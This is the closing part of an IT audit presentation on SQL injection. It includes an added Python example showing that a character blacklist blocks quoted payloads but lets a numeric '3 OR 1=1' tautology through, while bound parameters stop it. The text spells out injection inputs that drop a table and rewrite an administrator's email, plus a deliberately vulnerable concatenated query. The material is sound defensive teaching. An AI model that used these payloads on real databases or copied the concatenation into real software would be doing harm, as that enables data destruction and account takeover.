    – Confirm that queries are built with bound parameters and that the application's database account cannot run DDL; a character filter on its own is bypassable (a numeric field needs no quotes) and does not limit what an injected statement may do.
  • Attack and Penetration Testing
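An added example (not from the slides) of the Inspect step: the character filter the slide describes, checked the way a tester would check it. It blocks the quoted payloads from the earlier slides but accepts input that needs no quotes at all, which matters where the canned query compares a numeric column without quoting; a bound parameter treats the same input as one opaque value. The catalogue table, its rows and the numeric item_id lookup are constructed for the example, as is the tautology input.

```python
import sqlite3

# The characters the audit slide says a filtering module should reject.
SUSPICIOUS = set("'\",/;&%$")

# Constructed catalogue: item_id is numeric, so the canned query compares it without quotes.
SCHEMA = """
CREATE TABLE ItemDB (item_id INTEGER, item TEXT, description TEXT, on_sale INTEGER);
INSERT INTO ItemDB VALUES (1, 'AP-1', 'american psycho 1st', 1);
INSERT INTO ItemDB VALUES (2, 'AP-2', 'american psycho 2nd', 1);
INSERT INTO ItemDB VALUES (3, 'SG-1', 'staff-only gift card', 0);
"""


def passes_filter(user_input: str) -> bool:
    """The black-list check from the slide: accept only input with none of the listed characters."""
    return not any(ch in SUSPICIOUS for ch in user_input)


def lookup_concat(db: sqlite3.Connection, item_id: str) -> list:
    """Numeric context: no quotes around the input, so none of the listed characters are needed."""
    sql = f"SELECT item FROM ItemDB WHERE on_sale = 1 AND item_id = {item_id}"
    return sorted(row[0] for row in db.execute(sql))


def lookup_bound(db: sqlite3.Connection, item_id: str) -> list:
    """Bound parameter: the whole input is compared as one value and never parsed as SQL."""
    sql = "SELECT item FROM ItemDB WHERE on_sale = 1 AND item_id = ?"
    return sorted(row[0] for row in db.execute(sql, (item_id,)))


def audit() -> dict:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    slide_payloads = [
        "x'; DROP TABLE ItemDB; --",
        "x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email = 'sysadmin@CLIENTX.com",
    ]
    tautology = "3 OR 1=1"   # constructed: the classic tautology, none of the listed characters
    return {
        "slide_payloads_blocked": not any(passes_filter(p) for p in slide_payloads),
        "tautology_accepted": passes_filter(tautology),
        # AND binds tighter than OR, so the WHERE clause becomes (on_sale = 1 AND item_id = 3) OR 1=1
        # and every row comes back, including the item that is not on sale.
        "concat_rows": lookup_concat(db, tautology),
        # Bound, the text '3 OR 1=1' is simply not equal to any integer item_id.
        "bound_rows": lookup_bound(db, tautology),
        # The real lookup still works through the bound query.
        "bound_rows_legit": lookup_bound(db, "1"),
    }


if __name__ == "__main__":
    print(audit())
```

When reviewing a filtering module, run it against inputs shaped for each context the application actually uses (quoted string, bare number, identifier) rather than only against the textbook quote-and-semicolon payloads; a filter that passes the numeric case is evidence that the real control has to be the query construction, not the filter.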
Created and Presented by Krishnendu Paul, Vice President – Technologies, Conversys Technologies Pvt. Ltd., A Maxelor Company

References
  • http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley
  • http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities_Bulletin_August2006.pdf – 2006 Visa USA
  • "Applying an improved economic model to software buy-versus-build decisions", Higaki, Wesley. Hewlett-Packard Journal, August 1995.
  • "Cobit 4.0", IT Governance Institute, 2005
  • Mitre Corporation, 2006
Thanks
Conversys Technologies Pvt. Ltd.
  • Kolkata Office: 7, Bondel Road, Kolkata, West Bengal, India – 700019. E-mail: info@conversys.in. Telephone: +91-33-64602675
  • Pune Office: #204, Casa Grande, Lane No. 8, Koregaon Park, Pune – 411 001. Telephone: +91 20 26052014
  • US Office: 15 Corporate Place, Suite# 333, Piscataway, NJ, 08854 USA